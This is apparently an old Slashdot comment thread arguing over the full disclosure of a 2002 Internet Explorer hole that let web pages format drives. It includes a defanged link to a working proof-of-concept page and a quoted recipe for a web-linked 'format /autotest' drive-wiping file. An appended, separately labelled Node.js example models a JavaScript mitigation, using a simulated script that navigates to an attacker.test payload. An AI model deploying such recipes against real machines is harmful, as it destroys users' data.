To hide an exploit doesn't remove it. Damnit, it was there from the first day the software was released! Just because script kiddies haven't found it doesn't mean it's not in the wild. And when someone finds out WHERE there is a hole you will have a lot of people poking into that hole to find out how to use it. The vendor must be quicker than the kiddies. Today it seems that no exploit is fixed until somebody screams "bloody murder" and releases an exploit.
I think it is because MS wants to keep their official exploit numbers at a minimum. If it's not official they just shut up and hope that no one will discover it.
Don't shoot the messenger.
HTTP/1.1 400
You should be thanking Slashdot for posting a link to that page. There's now one less page for hackers to visit to learn the latest exploits.
- Houdini
but the exploit got to em first
"Some fight for law. Some fight for justice. What will you fight for? One day, you will see."
I can see it now.. Thousands of script kiddies licking their lips over THIS one! Sometimes there's a line between telling and showing...and they didn't just tell..they SHOWED the kiddies how to do it! This is really bad.....
The article is stupid and wrong.
The sploit paper says that MS was contacted about the combined exploit October 4, which is not in November, and that they have closed the issue with a "will not be patched because XYZ" statement, which is not to be investigating the issue.
Two critical wrongs in fact out of two possible. I just felt a sudden urge to trust the rest of the article so much more...
because companies like MS like to deny it. If they denied it on this, then it should be disclosed. Companies such as MS must be held accountable.
I agree that malicious code shouldn't be readily posted without a patch, but sometimes it takes a lot to get a company to make changes. Look at Microsoft, you think they would care about security issues in a program until somebody released malicious code to the public, the company then is forced to patch the program to avoid a bad rep and THEN to avoid problems for their users... just my two cents...
Microsoft is sending some of their people here tonight to give a talk about how cool they are and how fun it would be to work for them (recruitment meeting). I think I'll mention this exploit to them and see what their response is.
The joke they always make is "For those of you who want to work in software testing... Yes, we do test our products (wait for laugh)"
There are only 10 kinds of people in this world... those who understand binary and those who don't
Bugtraq is worth its weight in gold. I am responsible for a bunch of systems. If there is an exploit out there for software I am running I want it to be publicly posted for two reasons.
1. Public posting of exploits puts pressure on vendors/maintainers to fix the problem. It has been demonstrated time and time again that vendors are more worried about making money than supplying secure software. If there is not a clear, publicly demonstrated threat they are not going to make the updates I need to secure my systems.
2. I want to see it so I can evaluate if my systems are at risk. I am responsible for my network. If the buck stops with me, I only trust when I can verify. This allows me to sleep well at night.
If they cared at all about security maybe this "Huge IE Hole" would not exist...
Clearly, the code and descriptions for the bug are Windows-only. The question is, does a similar bug (vulnerability to cross-channel scripting attacks) exist in the Mac version? No mention of this on the forums. I would guess not, but I'm using Chimera until the bug is fixed just in case.
PS. To all those people who think MS are evil and that I should be stoned for using Internet Explorer at all: remember that although it lacks tabbed browsing and popup-blocking, Explorer is in most ways superior to Mo and especially to Chimera. The most important difference is that IE runs faster, considering that I'm seeing typing lag as I write this post in Chimera. It's only a couple tenths of a second, but still quite annoying and totally inexcusable on a 700MHz machine. Also remember that IE Mac is much better than IE Windows for some reason (I've heard Office X is also much better than Office XP, but never tried either).
I hereby place the above post in the public domain.
my company refuses to upgrade from ie 4!!!
hahahahahahahahahah
Can't write a proper post, laughing too hard
hahahahahahahahahahahahhahaha
*cough*
hahahhahahhahahahahah
Microsoft(TM) intrudes^w introduces an incredible new PR nightmare^w^w way to work(TM)!
Trojaned@Home(TM) - work on any problem you want(TM)! Set millions of CPUs working at a moment's notice(TM)! Every copy of Windows(TM) has this glaring security hole(TM)^w^w^w feature(TM) built in!
Trojaned@Home(TM) is super fast, due to Microsoft(TM)'s secret Code Hider^w Layering(TM) technology, which ensures that it's always on(TM), and ready to work for you(TM)!
See the power of the internet(TM) multiplied by millions(TM) of smart Windows(TM) users today!
Use Trojaned@Home(TM)!
Ha! You already are(TM)!
As most people are still running Windoze, we can't just ignore the problem. If this is a real problem then of course I am concerned because I will get a call from my sister or my dad who don't have the money or the time to upgrade.
However, if you read it on bugtraq you could easily figure out that it was serious and how to work around it.
A citizens' group publicly released instructions on how to cheaply and easily produce large quantities of weapons-grade smallpox, anthrax, and ebola. When asked why, the spokestroll for the group replied "We hope that by making this knowledge commonplace, the larger pharmaceutical firms will get off their asses and develop effective vaccines and treatment for these diseases, and save the world's population from all biological weapons." He continued, explaining that his next projects were to elect Hillary Rosen as US President to speed the demise of the DCMA, and to airlift 250,000 Scud missiles to Iraq to promote Middle East stability.
While I agree with you in principle, and I'm sure we share the bond of 360k floppies with zipped copies of viruses, I have to disagree with the details.
I remember a time when the source code for some vulnerabilities was disclosed, but with errors. If you didn't know how to fix the error, you couldn't use the vulnerability. This way, it was kept OUT of the hands of script kiddies, but put INTO the hands of those with a clue on how to fix the problem.
I'd be willing to bet 95% of the break-ins on the internet are plain old script kiddies. IMHO, there isn't any more port scanning going on, there isn't any more social engineering of the average joe's desktop pc. That sort of work is left to the 'expert' black hats, trying to get into the 'treasure chest'. The rest are lamers just running what they found.
IMHO, if BugTraq is going to post vulns, they need to be non-working, and the user has to have the knowledge to fix them. Especially on closed platforms, it does less good to release exploits for code you can't fix, because you're not fixing the problem, you're just working around it.
"I can't give you a brain, so I'll give you a diploma" - The Great Oz (blatantly stolen sig)
Found the code, made a web page and verified the exploit with ie5 win200...
Tried it on WINE using CrossOver Office.
and was very disappointed to find that WINE once again did not live up to its goal of being bug-for-bug compatible with Windows.
All I got was HTML Help and a script error. No files written to my "C:" and no exploit.
*sigh* Guess WINE still needs some work.
Don't you know that by now? Forcing people to install Linux by tricking them into clicking what they think is just a link is going to smear shit all over Linux's rep and that of its advocates.
I hope to Hell that you were joking.
Running Chimera (Mozilla for OS X). Ho Hum another active X exploit. Now as a sys admin for an all Apple office what do I have to do? Well, I still haven't finished reading the old Andre Norton paperback I found at the used bookstore ...
By posting it to some legitimate high traffic area (like bugtraq) aren't we just encouraging more people to exploit the bug (like anti-MS Linux Zealots)?
I can tell you were born around hackers. Cause in the business world you -need- at least a few weeks AFTER the coded fix is in to test out the new fix and see what other things the fix broke, or other bugs you may have exploited.
This isn't your 1337 world where you just toss out some code and hope everything is keen.
Is this some new security list in the style of Bugtraq, or yet another example of the submitter/slashdot staff not bothering to actually check the facts and spellcheck their stories before being submitted?
...which a friend and I posted to bugtraq. It turned out to be a previously undiscovered variant of the semisoft virus, which we'd dubbed "net.666" for a few reasons (just so you can check my story).
We made a web site that showed how to clean an infected system and had downloadable infected files for virus researchers. At the request of some of the researchers, we took off the files and gave an email address for researcher requests instead.
Surprisingly, we got emails from script kiddies (some posing as researchers, some not) trying to get copies of the virus.
But, by the end of that week, there were separate executables from a few companies implementing our cleaning methods, and the next round of signatures could detect it.
I think it would have been a better idea for these guys to just post the solutions and keep the exploit code itself as secret as possible. MS will pretty much HAVE to deal with this one. It's the kind of exploit you hear about in hoax emails, but I don't think it's going to make their lives much easier knowing that this exploit is so widely available, not to mention the people who get hit by it.
vk.
Not the whole full-disclosure discussion again. The topic has been discussed to death on pretty much every security-related mailing list, newsgroup, whatever for the past years.
And frankly, if you surf with IE, which has known security holes that have been unpatched for well over a year, you simply deserve whatever you get.
Assorted stuff I do sometimes: Lemuria.org
1 - User opens malicious site with malicious java applet ... ...
.. there is no format C:
2 - Malicious applet sends user subliminal messages "Fooormmmat yourrr harddd driveee"
3 - User starts feeling uncontrollable urges
4 - User formats drive
This does not work on linux
I fuse with Mercer every single day...
You can get a patch here.
No, actually, the *responsibility* lies with ...
Is Ford then responsible for the ensuing carnage when some tool realises he can drive on the other side of the road? no..
what more can i say, whoever posted this bug/working code should be shot
Under Mac OSX 10.1, Internet Explorer 5.1.2 runs as root or as some kind of su and has access to the entire system and basically doesn't care if you have directories that you would rather protect. Mozilla respects FS protections. Under MacOSX the Java JDK documentation is hidden away in the Frameworks/Java... directories where a non-admin user has no access. To browse these I usually make a link in my browser to the index.html file and carry on from there. I discovered that IE lets you in everywhere it can go while Moz doesn't.
Differing perspectives on security, I suppose.
Pretty much ALL the articles in BugTraq help script kiddies.
Right, because script kiddies don't hang out on IRC and get this stuff before Bugtraq. Also, the sky is not blue and there is no porn on the internet.
The most sensible thing I've ever read about this kind of question is the Crypto-Gram article last year by Bruce Schneier.
Prime numbers are exactly what Alan Greenspan says they are -S. Minsky
Just because you can find the code "everywhere else on the web" does not mean you should share the code yourself. I find something like this akin to leaving porn magazines in your yard because the neighborhood kids will find them in the trash bin (or surfing the net - sic) anyway.
It's like "I know how to hang a person - here, let me give you a demonstration." Does sharing the code that can cause the problem allow you to protect yourself against it? Probably not; unless you are out there building tools to protect us - that's right, US, including the very experienced tech people here - against such attacks.
I don't like the idea of non-disclosure. I want to know if there is a potential that something bad could happen to me or my clients; and that I should start working on or be on the lookout for preventative measures. That's why we have vulnerability lists. In that same hand I believe that Too Much Information is not polite - to the users and the vendor. Here's how you make the gun; oh and here are some bullets. It is almost criminal in its intent - considering the mindset of many today it *is* criminal in its intent - regardless of target.
I think with the interesting people, their lives can't possibly be wrapped up into a nice little package.
It seems to me that there are a lot of people that, if their hard drive reformats, will drop their machine in the trash and go and buy a new one. This would mean that MS will be selling more of their OS. Yes, this is a paranoid thought, and I am sure that our friends in Redmond wouldn't do this.
If script kiddies want to put a virus on a machine, then if they reformat that machine, they don't get to do this. As a matter of fact, it really ought to give them no satisfaction at all as the machine will be down and out and gone.
More dangerous would be if this was used as a way to attack our systems by our enemies.
In any case, we can keep hashing over this all day. Two weeks for such a serious bug doesn't seem that long to me.
In germany Heise.de even published an exploit:
C't Browsercheck
You can test your IE and report the results to your boss.
See also:
Sandblad at Securityfocus
The exploit doesn't scare me as much as it adds more fuel to the SuperVirus theory I've been worried about for a while.
I believe that it's only a matter of time before someone creates a "SuperVirus", a virus with all previously successful exploits, and unleashes it on the world.
With the recent outbreaks of Klez, Code Red, Nimda, Kak, Sircam, and other viruses that do minor damage and proliferate fast through multiple exploits, it's only a matter of time until a script kiddie gets it into his head to combine them all and make a virus that infects everything, spreads through multiple existing holes, and does a massive amount of damage via either DDOS, format after a set time, or both.
In Soviet Russia, Trojan exploits YOU!
you need to get a sense of humor.. stat!
People who use IE obviously *like* living dangerously. If they didn't, they wouldn't be using IE, would they?
Oh, wait, you think that they don't *know*? Pshaw! They're like the people who choose to drive SUVs like a sports car -- they may _say_ that they don't know, but either they do, and are lying, or they don't, and are stupid. Either way, the responsibility lies with the user.
There are enough people out there pointing out that IE and Outlook are broken and dangerous that there's no reasonable way anyone can think that they aren't. Except if they put their fingers in their ears and go "LalalalalaIamnotlisteninglalalalala" whenever the subject comes up.
The IE users who get hit by this exploit should suck it up and take responsibility for their risky actions. And have a good backup system in place, of course.
Would the publication of this sploit violate the law in any way? Look at it this way: If you can use the sploit to format a hard drive, you can use it to D/L possibly copyrighted material off the victim computer, right? And as we all know, the RIAA and MPAA have it in big for technologies that can violate copyright. Wasn't that the whole premise of the DeCSS per^H^Hrosecution?
This is not my sandwich.
that's a big hole, i wonder if bill gates will have to patch that one up personally
I just tried out what the supposed exploit is supposed to do, and though it did bring up a chm file, it did not execute the rest of the script. Instead, IE choked and crashed, and everything was fine. No files were written to my hard disk, and Minesweeper did not start up. According to the original post on securityfocus, it looks like it applies to a bug that went unfixed for IE6. I am trying my testing on my system, which is W2k SP2 with IE5.5 SP2. Perhaps this really only does apply to IE6? Maybe it was a bug that originated in a previous version, went through CM and somehow, someone forgot to make the appropriate code changes for the IE6 release?
It seems like every couple weeks there is an article on /. to the effect of "BIG HOLE IN IE/XP/[MS APP HERE] DISCOVERED. THE END IS NEAR! REPENT, MS USERS" etc etc...ZZZZZZZzzzzzzzzZZZZZZZ -_-
There are only so many times you can read a headline like that before the "cry wolf" factor starts to kick in. All these "bugtraq" alerts are academic...theoretical...What I want to see is a headline that reads Merrill Lynch crippled by XP flaw. Plans to sue MS for millions $$$ damages or somesuch. Or at least a story of an actual user whose life was ruined by an actual MS security hole. Something tangible...Now THAT would be interesting!
As a side note, you could try usinginstead. It will have the same effect. In this case, not formatting your hard drive.
What new ground is broken here?
None.
The simple fact remains that Micro$oft produces products that are riddled with the most egregious of security lapses, and that Micro$oft has an unrivaled history of dragging its feet/passing the buck, even when billg is hit over the head repeatedly with the fact that his minions have unleashed yet another f*ckup on the unsuspecting public.
So, it's possible to contrive html that, when viewed on a remote web site, reformats the local hard drive of the box IE is running on?
Are you kidding me?
billg and every single idiot who was anywhere close to being involved with this f*ckup should be sued for every last penny they have.
As for full disclosure, let 'er rip.
It's the only way Micro$oft will ever be held in the least bit accountable for their crap.
t_t_b
I'm on PJ's "enemies" list! Are you?
I copied the code, saved it as a.html, put it up on a webserver and opened it with IE 6. All that happened was the help file started.
I remember a similar vulnerability from a couple months ago (it too was based on the windows help file), and I patched against that, so maybe that patch stopped this one? I don't normally use IE, but maybe I flipped something to turn off some of the scripting.
Anybody else not have a problem?
As it happens, a bug of this type has been around for a long time, affecting non-SP1 installations of WinXP (such as my own). However, The Screen Savers described the bug and how to fix it on national television. No harm done.
On the other hand, some people are saying here that the bug has only been known for about 12 days. I think that this is simply not true. Because all the news agencies are walking on eggshells not to give ANY USEFUL INFORMATION WHATSOEVER, I can't be sure whether this is the same exploit or not. If it is, then it has, in fact, been known about both inside and outside Microsoft since JULY. The Screen Savers talked about it on September 10. If it is the same exploit, then 12 days is naively underestimating how long the exploit has been around.
don't get mad at the bringer of bad news, get mad at the idiots who left this bug in their shitty software.
Ok, so Microsoft illegally uses their market power to drive competition out of the marketplace.
Anti-microsoft zealots post the code to take advantage of an IE security hole, allowing malicious coders to erase Microsoft from the marketplace.
Do both suck for the end user? Yes. But they're also both Microsoft's fault.
Let's face it, this is a case where it is 100% ok to blame Microsoft for having a crappy product. If Ford screwed up and made a car that anyone could unlock and start by doing something special to it, allowing the car to be easily stolen by anyone, you wouldn't blame the guy who posted how to do it on the Internet, you'd blame the Ford engineers who screwed up the design in the first place and the people who let that mistake out of the factory.
Microsoft screwed up, Microsoft customers get screwed over, Microsoft's fault.
paintball
If you were confronted by someone who had just lost a bunch of important data because of this exploit, do you really think they'd be impressed if you said "But I was trying to make a very important point to Microsoft!".
Instead of that, you should say "By not fixing the bug, Microsoft was trying to make a very important point to you!"
Then they will at least be angry at the right entity.
I tested the code on my Win2000 IE 6.0 machine, and it popped up a javascript window, a Windows help menu, and a command prompt (which appeared minimized), all fairly quickly. However.. the command prompt was waiting for me to push "y" to the "do you really want to format?" y/n prompt.. I don't believe there's a /Y switch either.. at least, not a documented one, so perhaps it can't format your drive after all?
"Truth is not decided by majority vote" consensus gentium -- Norman Geisler
A large problem is that web applications tend to require javascripting in order to function. Sure, I have a bit of javascripting in mine, but this sort of exploit is the reason why I make sure the app degrades gracefully. You really, really need to check and validate passed vars and such on the server side anyway. So - first make it work without javascripting, and then enhance it using javascripting.
Life for security conscious admins would be much easier if we all abided by this principle.
Stop the brainwash
Since when have Mozilla and pals been perfect?
All these people ranting about "It's your own fault - using software you know is defective..." - I'm sorry, but I don't know of any software that I know to have no defects.
At least IE gets regular fixes through auto-update. Mozilla et al don't tend to do that and also don't tend to *work* as well as IE for most browsing needs. If it's a choice between two bits of software, neither of which I know to be secure, I might as well choose the one which does most other things better.
This is just a copy of Andreas Sandblad's advisory, with a new command.
http://wwx.dino-soft.org/auto.html
note: prefix altered in "wwx". Needs to be reversed into "www" to make the URL work -
The above url when viewed WILL FORMAT THE A:\ drive when viewed on a fully updated and patched windows system. If you go there make sure there is nothing in the A:\ that formatting will harm; because this has been tested
and works on Windows 2000 WinXP/home/corp/pro Win98/SE.
This is a harmless POC to give you experts here a heads up; because Microsoft HAS been informed of the hole; but they seem to be sitting on their hands, maybe much like the recent XP hole that they knew about before XP even shipped; but chose to wait until SP1 to correct.
This is VERY DANGEROUS, and this little harmless POC could quite easily be made to be quite nasty; but when the author of the original hole (whose hole I have sort of legoised and made to work a very little bit differently) contacted them, Microsoft had this to say to the original author:
"Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".
It seems that what's really irresponsible is not what Bugtraq did, but running IE to begin with. Its history of security flaws and exploits along with Microsoft's foot-dragging responses make it utterly irresponsible to run such software.
That said, no one is immune from security exploits. The argument for posting it to Bugtraq seems mainly to be that this motivates the vendor to move quickly now that their customers know about the exploit and now that nefarious types have easier access to it. (Don't fool yourself into thinking the most malicious types didn't usually already acquire it by other means.)
But if what we really want to do is motivate vendors to patch things quickly, it should be the first rule of Bugtraq that no exploit is posted until the vendor is informed. Most linux security exploits are resolved within about 48 hours, while it is true that Microsoft often takes weeks or months. Given our competing interests in both informing the vendor privately and getting information to the public, we should balance these in a reasonable way. One such solution might be that Bugtraq adopt a rule that after a vendor is informed, they have 48-72 hours after which time it will be posted.
For both the responsible vendors and the free software community this approach would balance our interests in minimizing exploits while a solution is actively pursued while also acknowledging the benefits of full public disclosure.
In the case of smaller vendors than MS who might not have the resources for such a quick bug-fix, an appeal process could be instituted wherein the vendor may contact Bugtraq during the initial grace period and request an extension. Guidelines based on the resources of the vendor and the seriousness of the bug could be used to determine whether another 48-72 hours should be granted.
BWCarver
Like Digital Freedoms? Then donate to EFF before they're gone.
Does this mean I should get Mozilla?
And there is no hard and fast answer to this question. In this case however, we see a serious vulnerability. At the very least, Microsoft should have been allowed a couple working days to verify the problem, post an acknowledgement, and at least a temporary work-around --even if that work-around cripples their product in some way.
After a couple weeks with a bug this severe, they really ought to have posted a patch of some sort. The fear that the "script kiddies might take this snippet of code and run with it" is almost irrelevant. It's the professional spies and organized crime groups we ought to be scared of.
This script was inevitable. Why blame the messenger?
Nearly fifty percent of all graduates come from the bottom half of the class!
if the bug is disclosed in any manner, with or without malicious or non-malicious exploit code, _YOU_ as the public have benefitted.. there is no room for morality in full disclosure
Ever seen a consumer complaints program where they expose and sort out people's problems? This is identical, what is the big deal. Wasn't there a bug that allowed you to use one of M$'s scripting pages (on HDD) to delete files? It's great that somebody tries to make M$ make more hardened software.
puts ("Python r0cks\n");
Just Say No To IE(R). You cannot get much more simple, than that. And don't even think about going on about "I can't view my favorite web sites then..." etc, publicly accessible sites that write for one specific platform and/or browser should be boycotted. No hits, no ad dollars, no ad dollars, no business, no business, no platform/browser discrimination. Let YOUR non-IE web browser speak for you.
And I'm still waiting for some guy(or gal) to come out of the blue with a killer virus and wipe the internet clean....
Candy-Coated Knowledge
Of course they are "investigating the issue". I am sure they are "investigating the issue"; I am sure that they are "investigating" every "issue" that has ever been submitted... when someone asks about that issue.
Even if they are actually investigating it, are they really WORKING on it (read large team of experienced programmers familiar with the code), or are they just working on it (a single pimple faced intern coming up with ideas that his manager shoots down without consideration)?
It has been shown that massive attention is the only way to get action from the Redmond Giant, so... the messenger should not be shot.
"I'll have a Guinness, no wait, make that a Coors Light" -Grad student I work with, who shall remain anonymous...
Remember, it's the script kiddies that format your hard drive, not the malicious code!
Now if only someone could break into update.microsoft.com and put the exploit there...
(The Windows Update program uses IE. Good design decision to use your most insecure piece of code for security updates, isn't it?)
Assorted stuff I do sometimes: Lemuria.org
If you read Sandblad's actual BugTraq posting you will see that he had notified Microsoft more than a month before posting the details of the exploit. Quoting:
Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response was that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".
How much time does a company have to actually fix a problem this serious? When somebody takes the trouble to notify a company about a defect, they've already demonstrated helpfulness and responsibility. It would make sense for the company to take that helpful, responsible person into the loop, and at least update them periodically about what is being done about the problem. That would give a helpful person like Sandblad a basis for continuing to wait. In this case Microsoft gave no indication that they were doing anything about the problem or intended to do anything about it. Continuing to sit on the information certainly wouldn't give them any further incentive. Sandblad reported this problem, got a thanks-but-no-thanks, then after a month of no news went over their heads to the public. I would say he handled it very responsibly.
or cylinders.
I don't see why Symantec is getting the bum rap. MS OS & middleware is full of holes and it's about time Joe Public realized it. Even if that realization comes with the deletion of all of his precious pr0n!
My machine is up to date with patches. It also runs a real-time antivirus scanner at all times. To break the windows-iexplorer-outlook trio, I use mozilla and mozilla mail. The whole thing is behind a debian woody NAT machine which has no incoming ports open, and the smb shares that the NAT offers is periodically scanned for viruses by a linux port of an antivirus program. The windows 98 machine runs its own firewall program (tinyfirewall), not to close ports, but to prevent rogue programs from phoning home.
Under such a situation, I expect a reasonable level of security. Nothing more, nothing less. I'm still going to set up an email-virus scanner (for my own knowledge), and I know that there are ways around my security (most of them require ignorance on my part though), but I feel safe.
<humor> Now, if someone were to say that there weren't any holes in IE, that would be controversial. this is just "business as usual - where have your files gone today?". </humor>
It's just unfortunate that this is the sad reality.
Why exactly does the world feel entitled to control the results of research it did not pay for, and had nothing to do with? To wit, why would I, as a security researcher (see my web page for some examples), give away for free the results of my research to Microsoft, Sun, IBM, or any other company, when doing that research cost me significant time and money? The era of software vendors getting research for free is over. Now, they get it when everyone else gets it - whenever I have the spare time and energy to explain it in small words, or whenever they pay me money to do so, whichever comes first. I think you'll see more and more small consulting companies and independent researchers moving towards this policy. We don't need the "fame" from having a one line attribution in a vendor's advisory, and we have more lucrative things to do than explain every little aspect of our research to an ungrateful and frankly hostile vendor's "security response" staff.
That's excellent! Bravo! A very concise and appealing way of describing the problem, and MS's way of dealing with it.
Under the rug there's a trapdoor leading to the apartment below me.
Give up, it's hopeless. Believe me, I tried. Even if you board up all the doors, someone'll still find a way to sneak in through the kitchen window you left ajar and clean out all the treasures in your trophy case. You just can't win.
Where does the hypocrisy end, Taco?
Because IE sucks.
I guess we can add this to the 100+ features why Mozilla is better than IE :-)
< blunk blunk! >
I'm assuming that you have no issue with Bugtraq's posting of the initial advisory from Andreas Sandblad on the 6th. Now, the code that was posted on the 14th (over a week later) that is causing all this ruckus was cut-and-pasted from a discussion going on on ZDNet forums. In other words, those that would do harm already had the code.
I'll grant you that posting it to Bugtraq probably doesn't add all that much information for the "good guys" (except that the javascript in the "format a:" version is simpler to read), but it has the added benefit of getting someone like Wired to make a big stink out of the whole affair. The publicity is important as a way of getting the bug fixed. Security bugs are viewed by Microsoft (and anyone in the consumer software industry) as PR problems - posting this to Bugtraq doesn't make the bug any worse for users of Microsoft's systems (since the kiddies already have it), but does make it much worse for Microsoft. It's much harder to spin away a bug when live, functioning exploit code is staring you in the face.
I can't hear no heads grinding away with your spelled-it-all-out line.
Not even when writing do I hear any heads grinding.
I do, however, smile at your obvious frustration. Relax a bit, this is not worth getting that all worked up over.
Not to troll, but perhaps slashdotters should be extra careful of the links they click (for those on IE) in the near future.
Goatse is disturbing and easily detected, but I'd imagine that this script could be setup almost anywhere, making it easy to slip in a slashdot comment.
And yes, I'm sure there are probably enough trolls on here that somebody would try it if they knew how.
right here
getSexySig();
1. When correcting spelling/grammatical/usage errors, you should quote the words/phrases in question, as follows: "BugTraq," not "bugtrack..."
2. "Quibbling," not "squibbling" (as another reader has pointed out).
3. "BugTraq is a mailing list dedicated to full disclosure." No; BugTraq is a mailing list dedicated to tracking bugs. One of its principles is full disclosure.
4. "...it becomes up to the person who..." - very poor grammar. Better: "...it's the responsibility of the person who..." or "...it falls to the person who..."
5. "...be responsible for it's content." "Its," not "it's." ("It's" is the contraction of "it is.")
6. "...notification before releases..." Singular or plural? The terms should agree. Use either "...notifications before releases..." or (better, since this usage means a general principle) "...notification before release..."
I'm not even out of your first paragraph yet; there are at least as many more errors as I've already listed. My point is this: if you're going to be pedantic, at least be correct.
Sorry to be heavy-handed; for what it's worth, I agree with your point.
I actually posted a similar question to "Ask Slashdot" about a year ago. It didn't get accepted, but basically it said the following:
[snip] This brings up the question of whether or not the benefits of disclosing the information outweigh the problems. While attackers can exploit the holes, it pushes companies to release a patch as soon as possible. Personally I'm all for disclosing the full information. But that got me thinking about another example of security disclosure. After September 11 it was impossible to escape "news reports" speculating on the next terrorist attack and their next weapon. They mentioned that smallpox would be a good weapon and went on to detail why. They said we have no cure and we're not prepared for it and basically said that if they used that against us we'd be powerless to stop it. I also saw reports on the least secure airports and how people sneak weapons through security and so on. I was angry when I saw this information being broadcast for anyone, including terrorists, to see. They could easily use this information to plan another attack. The reporters were doing the terrorists' research for them. In theory, these are the same debates. Should vulnerability information be disclosed in order to better prepare for or fix the security hole? I'd be curious what other people think. Can you support full disclosure of security holes in software, but not support full disclosure of certain national security threats, without being a hypocrite?
K-meleon & Phoenix are still faster than Opera7, and free & libre.
Looks like automated formats via "mined" web pages in Explorer have been around for a while now. This Bugtraq link is from back in 1999:
http://online.securityfocus.com/archive/1/28213
Bits of note include:
"The key is the Format command's "/autotest" flag, which I believe was put into place early on in MS-DOS's history to assist in batch processing, and was probably dropped from the documentation some time back (it's not in my DOS 5.0 manual as far as I can tell -- although that's not too far in the past). It can be tested for by entering:
"Format a: /autotest" at the MS-DOS C:\ prompt.
The automated format via web page can be accomplished as follows (with the example shown demonstrating how to create a link on a web page which will automatically format Drive A):
1) Either:
Create a .pif file ("Format.pif") with the Command Line set to:
"C:\WINDOWS\COMMAND\FORMAT.COM a: /autotest"
And Working Line set to:
"C:\WINDOWS\COMMAND"
Or:
Create a .bat file ("Format.bat") with a single command:
"format a: /autotest"
(Should the user wish to format another disk, the a: may be replaced with c:, d:, e:, etc.)
2) Link to the file on a web page as follows:
Click Me
Or:
Click Me
According to the method chosen for implementation in step 1. These links may be placed beneath graphics or text, as would be found on a regular web page.
3) Upload the html document and .pif or .bat file to the targeted web server directory and wait for an unwary user to click the link and 'Open'.
These steps don't create a Trojan Horse so much as an out-right "Cyber Mine" which will be activated on a user's machine the instant they click the link and accept the file into their system. As the download of the 1k file is almost instantaneous, damage will be made to the user's data in a matter of seconds."
Spooky, eh?
What would really worry me is if someone cracked into a high traffic site and added this code. The havoc it would cause would be interesting, i.e. slashdot or cnn.com tainted with such code.
Does anyone remember the time when Yahoo finally found that someone had edited the text on their frontpage. White on white text that could be highlighted. I don't know the details, but I knew about it long before yahoo discovered this.
It *can* happen, but now companies are definitely more security cautious.
Fortunately, I use mozilla, I made the full time switch and lived with the minor bugs the day Gator mysteriously installed itself on my system while browsing with ie. (there was a previous story on the incident with that exploit).
"You should always go to other people's funerals; otherwise, they won't come to yours." -- Yogi Berra
An example can be seen in the game everquest. There was an exploit that allowed characters to crash portions of the world with almost no effort. It was left in for months because it was mainly contained on one server. It had been /bugged and reported to the maintainers of the game multiple times w/o response.
Finally, a player from the server became fed up and posted exactly how to exploit it on multiple message boards where it would be widely seen. Within days it was being used on ALL servers with regularity. It was patched in the next patch less than a week later.
Companies deal with jobs according to their importance, which is not only the severity but the population affected (if anyone has watched Fight Club, when he's speaking about his job you get the idea). By spreading the knowledge the importance is increased. And Bugtraq is the best place to spread it, as it will get out to as many people responsible for security as possible.
I do security
And to be honest, I'd be much more scared about something like than I would about having my hard disk formatted.
(Didja know there's a one-step command-line FTP in Windows? Very useful for this kind of activity.)
Download and install Mozilla.
Yes, Mozilla has had its share of security flaws, but they generally get fixed faster, too.
You can format your hard drive and, if you want to be a SysAdmin (for the heck of it), you can also format others' hard drives.
Yea..Mozilla beat that !!!!
If you've ever read FlatLand, you'll know that it's possible to get into a completely locked and secure room.
Big Deal! Anyone who browses the web as root in Windows XP knows enough not to go to malicious web sites. Not to mention they probably use mozilla anyways :)
So I figured that I could avoid this by just deleting the key in my registry for IE help so that the OCX would never load and the exploit wouldn't work. I did that and it solved the problem! But wait... Windows is now trying to "help" me by putting that registry key back the way it was! Thank you so much Windows for saving me from myself and reopening the door to my harddrive. What would I do without you?
After reading the proof-of-concept script at http://online.securityfocus.com/archive/1/298748, I now know at least to avoid blind links.
Also, I've come up with this possible solution:
In IE, bring the potentially malicious page to the front, then press Ctrl-O to get the Open prompt. Enter this:
javascript:void(location.replace=null)
then click OK. Now anytime that a javascript on that page tries to do a location.replace command will now instead issue a null command (no command at all). (Assuming the script hasn't already been activated, under an onLoad event or something)
This works with annoying exit pop-up ads too:
javascript:void(window.onunload=null);
You can do this with all sorts of javascript commands that get abused. Find some offensive pages, look at their source, and disable the commands you see used often. (onunload is probably the worst and most often used).
Major inspiration from this cnet builder page.
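To see what the Ctrl-O trick in the comment above actually buys you, here is an added example that is not from the original post: it models the trick in plain Node.js with a constructed stand-in for the window object, since there is no real DOM outside a browser, so the `makeWindow`, `neutralize`, `hostileScript` and `simulateUnload` names and the URLs are assumptions of this example. It shows the nulled hooks stopping the `location.replace` and `onunload` paths, and also the caveat a practitioner would want: a page script that falls back to assigning `location.href` still navigates, so this is a speedbump rather than a fix.

```javascript
'use strict';

// Constructed stand-in for the browser window object (no real DOM here).
// Every navigation or popup it performs is appended to `log`.
function makeWindow() {
  const win = {
    log: [],
    location: { href: 'http://example.test/page' },
    onunload: null,
    open(url) { win.log.push('open:' + url); },
  };
  win.location.replace = function (url) {
    win.log.push('replace:' + url);
    win.location.href = url;
  };
  return win;
}

// What typing javascript:void(location.replace=null) and
// javascript:void(window.onunload=null) into IE's Open box amounts to.
function neutralize(win) {
  win.location.replace = null;
  win.onunload = null;
}

// Constructed hostile page script: prefers location.replace, but falls back
// to a plain location.href assignment when the method is gone.
function hostileScript(win) {
  try {
    win.location.replace('http://attacker.test/payload');
    return 'replace';
  } catch (err) {
    win.location.href = 'http://attacker.test/payload';
    return 'href-fallback';
  }
}

// Fire the unload handler the way the browser would on page exit.
function simulateUnload(win) {
  if (typeof win.onunload === 'function') {
    win.onunload();
    return true;
  }
  return false;
}

// Run the same hostile page against an untouched and a neutralized window.
function demo() {
  const run = (harden) => {
    const win = makeWindow();
    win.onunload = () => win.open('http://ads.test/popup');
    if (harden) neutralize(win);
    const path = hostileScript(win);
    const popupFired = simulateUnload(win);
    return { path, popupFired, href: win.location.href, log: win.log };
  };
  return { untouched: run(false), hardened: run(true) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

In the hardened run the log stays empty (no `replace`, no popup), but `href` still ends up at the attacker's URL: overwriting one method only blocks scripts that happen to use that method, and it does nothing for a script that already ran in an `onLoad` handler, which is the same limitation the comment notes.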
security hole in IE that allows malicious web pages to reformat a hard drive
